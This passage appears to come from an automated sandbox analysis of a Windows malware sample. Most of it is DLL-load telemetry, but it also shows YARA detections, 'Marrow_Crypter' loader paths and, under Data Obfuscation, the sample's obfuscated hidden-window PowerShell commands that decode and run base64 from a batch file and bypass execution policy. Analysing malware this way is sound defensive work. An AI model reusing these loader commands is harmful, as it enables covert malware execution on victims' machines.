              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: dpapi.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: version.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: framedynos.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: dbghelp.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: winsta.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: version.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: windowscodecs.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: edputil.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: dpapi.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0bf754aa-c967-445c-ab3d-d8fda9bae7ef}\InProcServer32
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: C:\Windows\SysWOW64\PING.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.pdb source: powershell.exe, 00000002.00000002.2227274185.000001DC2D7E3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.pdb source: powershell.exe, 00000002.00000002.1839501596.000001DC185B8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.pdbhP source: powershell.exe, 00000002.00000002.1839501596.000001DC185B8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\PhantomShark\Documents\Coding Projects\Marrow_Crypter\Net_Loader\Net_Loader\obj\Release\Net_Loader.pdb source: PING.EXE, 0000000A.00000002.2229017631.00000000071A0000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000017.00000002.2508310620.00000000069F0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: C:\Users\PhantomShark\Documents\Coding Projects\Marrow_Crypter\Startup\Startup\obj\x64\Release\Startup.pdb source: explorer.exe, 00000006.00000002.2940202775.0000000010881000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.pdbH source: powershell.exe, 00000002.00000002.2227274185.000001DC2D7E3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: PING.EXE, 0000000A.00000002.2230752775.0000000007440000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000017.00000002.2509800489.0000000006C80000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: PING.EXE, 0000000A.00000002.2230752775.0000000007440000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000017.00000002.2509800489.0000000006C80000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: .C:\Users\user\AppData\Local\Temp\zozwmnym.pdb source: powershell.exe, 00000012.00000002.1992910476.0000026212AA9000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: .C:\Users\user\AppData\Local\Temp\zozwmnym.pdbhP source: powershell.exe, 00000012.00000002.1992910476.0000026212AA9000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\zozwmnym.pdb& source: powershell.exe, 00000012.00000002.2273172978.0000026228BF3000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, QI6Jy4WEhefhjRy8hP9.cs .Net Code: Type.GetTypeFromHandle(eUOp5DZUGvdM9Wa1LHI.zvEep2Fvcd(16777297)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(eUOp5DZUGvdM9Wa1LHI.zvEep2Fvcd(16777248)),Type.GetTypeFromHandle(eUOp5DZUGvdM9Wa1LHI.zvEep2Fvcd(16777365))})
              Source: 10.2.PING.EXE.7440000.5.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
              Source: 10.2.PING.EXE.7440000.5.raw.unpack, ListDecorator.cs .Net Code: Read
              Source: 10.2.PING.EXE.7440000.5.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
              Source: 10.2.PING.EXE.7440000.5.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
              Source: 10.2.PING.EXE.7440000.5.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=
              Source: Yara match File source: 23.2.PING.EXE.6c50000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 10.2.PING.EXE.7410000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000017.00000002.2509704658.0000000006C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000A.00000002.2230659559.0000000007410000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000017.00000002.2494654093.00000000046A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000A.00000002.2194405756.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: PING.EXE PID: 7032, type: MEMORYSTR
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zozwmnym.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BA97C46 pushad ; retf 2_2_00007FFD9BA97C5D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BA987BC push ss; iretd 2_2_00007FFD9BA9879A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BA976F2 push es; iretd 2_2_00007FFD9BA9772A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BA98B55 push edx; iretd 2_2_00007FFD9BA98B5A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BA98B5C push ebx; iretd 2_2_00007FFD9BA98B7A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BA98739 push ss; iretd 2_2_00007FFD9BA9879A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BA98B25 push eax; iretd 2_2_00007FFD9BA98B3A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BA9772C push es; iretd 2_2_00007FFD9BA9772A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BA97D7F push eax; retf 2_2_00007FFD9BA97DB2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB6C3DE push eax; retf 2_2_00007FFD9BB6C3E4
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB6A3F1 push cs; retf 2_2_00007FFD9BB6A4CA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB6A7FF push cs; retf 2_2_00007FFD9BB6A800
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB6C011 push eax; retf 2_2_00007FFD9BB6C012
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB6A41C push cs; retf 2_2_00007FFD9BB6A4CA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB6BFC6 push eax; retf 2_2_00007FFD9BB6BFC7
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB6CB82 push eax; retf 2_2_00007FFD9BB6CB83
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB6C789 push eax; retf 2_2_00007FFD9BB6C78A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB6A72C push cs; retf 2_2_00007FFD9BB6A74A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB6C739 push eax; retf 2_2_00007FFD9BB6C73A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB6BF4F push eax; retf 2_2_00007FFD9BB6BF50
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB6CAC1 push eax; retf 2_2_00007FFD9BB6CAC2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB6AA68 push cs; retf 2_2_00007FFD9BB6AA69
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB6D672 push ecx; retf 2_2_00007FFD9BB6D673
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB6C681 push eax; retf 2_2_00007FFD9BB6C682
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB6BE5A push eax; retf 2_2_00007FFD9BB6BE5B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB6A5B9 push cs; retf 2_2_00007FFD9BB6A5BA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB6A983 push cs; retf 2_2_00007FFD9BB6A984
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB6C51F push eax; retf 2_2_00007FFD9BB6C520
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB6A930 push cs; retf 2_2_00007FFD9BB6A931
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB6C141 push eax; retf 2_2_00007FFD9BB6C142
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB6A8DD push cs; retf 2_2_00007FFD9BB6A8DE
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, dS8NLBORQCnVypqC83v.cs High entropy of concatenated method names: 'BCqOXeTmv9', 'U3pOumGsu4', 'fuIOlTMxKk', 'zixOrHaVXa', 'CkiO8lhY9c', 'JySO0WQdTN', 'ltJO5WQVx9', 'GONOW3oATt', 'aOZOZW4wdH', 'GxEptKaimOF2wqBtrf1'
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, HXWgqf7QK37HQ0ZpisZ.cs High entropy of concatenated method names: 'wWc74tJV3d', 'i0M7tjFvsd', 'xmc7D5UyIb', 'DAQ76jgD5d', 'vKc7YmXJBj', 'qfo7BYhLkc', 'Jvm7yiCJ8F', 'hWa7sdSoWA', 'IqU7kwu7n7', 'Jca73Hjm9o'
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, Dc4xUxvOwXRXuWZuBqx.cs High entropy of concatenated method names: 'G1CvmmDfsR', 'iFtvXHTZZE', 'qv9vuYO6aw', 'pAmvl2BZg2', 'NfGvrmE0A6', 'BP0v8pdobr', 'BGPv0hNxQE', 'y9Iv5XC42W', 'uHgvWmqc8U', 'zU2vZv9sUB'
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, QI6Jy4WEhefhjRy8hP9.cs High entropy of concatenated method names: 'gvLhX3oBubUujS9vuYp', 'NLL83koyt6Wvt33yAhj', 'pgfZkkSeMY', 'vh0ry9Sq2v', 'tmJZg4Dl6V', 'bxiZD4WM21', 'IhOZ6o2txi', 'mOyZS55OA6', 'W6sek53ZPM', 'Uu9WcY71tn'
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, U3E6RwN5SaPZeZUlErQ.cs High entropy of concatenated method names: 'yJoNZ7E45S', 'm2sNvL1Jpg', 'CQmNKvbK7F', 'qaeN2NtOP8', 'iMXN1SIOn4', 'hyFNMf9N6a', 'Mk4N9wG0GL', 'jyTNIWn3VI', 'mxXNQrUQrd', 'kRONbW4oVv'
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, o8P76yvvHV5KpUNsml7.cs High entropy of concatenated method names: 'ogOQ0NcqVg', 'SAhQ5DjcbE', 'vjdQW9CUnK', 'kRLQZbCtQg', 'WEjQvXwYeL', 'QGfQKts7GH', 'JRuQ2fHKGZ', 'hT4vqP4jUa', 'dtRQ1ee6MW', 'CoWQMovtgf'
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, BYp4U2Oe5wBDI4goG2T.cs High entropy of concatenated method names: 'SAkbTlwEevfVN7OfceR', 'firsqowOpF5u7MyABPY', 'lC52Q4wnWMdK6pAtMIY', 'lI2Dh7wfSbAAVvtZHvc', 'IfrcE44OyD', 'eMvcO4ZytH', 'tptcceFFV9', 'QObcnPQgnZ', 'lJ8cfe8ReD', 'IekcCYmCMn'
